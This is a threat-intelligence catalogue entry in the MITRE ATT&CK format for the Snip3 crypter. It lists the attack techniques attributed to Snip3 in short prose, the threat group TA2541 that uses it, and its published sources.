S1086 Snip3
Snip3 is a sophisticated crypter-as-a-service that has been used since at least 2021 to obfuscate and load numerous strains of malware including AsyncRAT, Revenge RAT, Agent Tesla, and NETWIRE.21
| Item | Value |
|---|---|
| ID | S1086 |
| Associated Names | |
| Type | MALWARE |
| Version | 1.0 |
| Created | 13 September 2023 |
| Last Modified | 10 October 2023 |
| Navigation Layer | View In ATT&CK® Navigator |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1547 | Boot or Logon Autostart Execution | - |
| enterprise | T1547.001 | Registry Run Keys / Startup Folder | Snip3 can create a VBS file in startup to persist after system restarts.1 |
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.001 | PowerShell | Snip3 can use a PowerShell script for second-stage execution.21 |
| enterprise | T1059.005 | Visual Basic | Snip3 can use visual basic scripts for first-stage execution.21 |
| enterprise | T1140 | Deobfuscate/Decode Files or Information | Snip3 can decode its second-stage PowerShell script prior to execution.2 |
| enterprise | T1189 | Drive-by Compromise | Snip3 has been delivered to targets via downloads from malicious domains.1 |
| enterprise | T1564 | Hide Artifacts | - |
| enterprise | T1564.003 | Hidden Window | Snip3 can execute PowerShell scripts in a hidden window.2 |
| enterprise | T1105 | Ingress Tool Transfer | Snip3 can download additional payloads to compromised systems.21 |
| enterprise | T1104 | Multi-Stage Channels | Snip3 can download and execute additional payloads and modules over separate communication channels.21 |
| enterprise | T1027 | Obfuscated Files or Information | Snip3 has the ability to obfuscate strings using XOR encryption.2 |
| enterprise | T1027.001 | Binary Padding | Snip3 can obfuscate strings using junk Chinese characters.2 |
| enterprise | T1566 | Phishing | - |
| enterprise | T1566.001 | Spearphishing Attachment | Snip3 has been delivered to victims through malicious e-mail attachments.1 |
| enterprise | T1566.002 | Spearphishing Link | Snip3 has been delivered to victims through e-mail links to malicious files.1 |
| enterprise | T1055 | Process Injection | - |
| enterprise | T1055.012 | Process Hollowing | |
| Snip3 can use RunPE to execute malicious payloads within a hollowed Windows process.21 | |||
| enterprise | T1082 | System Information Discovery | Snip3 has the ability to query Win32_ComputerSystem for system information. 2 |
| enterprise | T1204 | User Execution | - |
| enterprise | T1204.001 | Malicious Link | Snip3 has been executed through luring victims into clicking malicious links.1 |
| enterprise | T1204.002 | Malicious File | Snip3 can gain execution through the download of visual basic files.21 |
| enterprise | T1497 | Virtualization/Sandbox Evasion | - |
| enterprise | T1497.001 | System Checks | Snip3 has the ability to detect Windows Sandbox, VMWare, or VirtualBox by querying Win32_ComputerSystem to extract the Manufacturer string.2 |
| enterprise | T1497.003 | Time Based Checks | Snip3 can execute WScript.Sleep to delay execution of its second stage.2 |
| enterprise | T1102 | Web Service | Snip3 can download additional payloads from web services including Pastebin and top4top.2 |
| enterprise | T1047 | Windows Management Instrumentation | Snip3 can query the WMI class Win32_ComputerSystem to gather information.2 |
Groups That Use This Software
| ID | Name | References |
|---|---|---|
| G1018 | TA2541 | 32 |
References
-
Jornet, A. (2021, December 23). Snip3, an investigation into malware. Retrieved September 19, 2023. ↩↩↩↩↩↩↩↩↩↩↩↩
-
Lorber, N. (2021, May 7). Revealing the Snip3 Crypter, a Highly Evasive RAT Loader. Retrieved September 13, 2023. ↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩
-
Larson, S. and Wise, J. (2022, February 15). Charting TA2541’s Flight. Retrieved September 12, 2023. ↩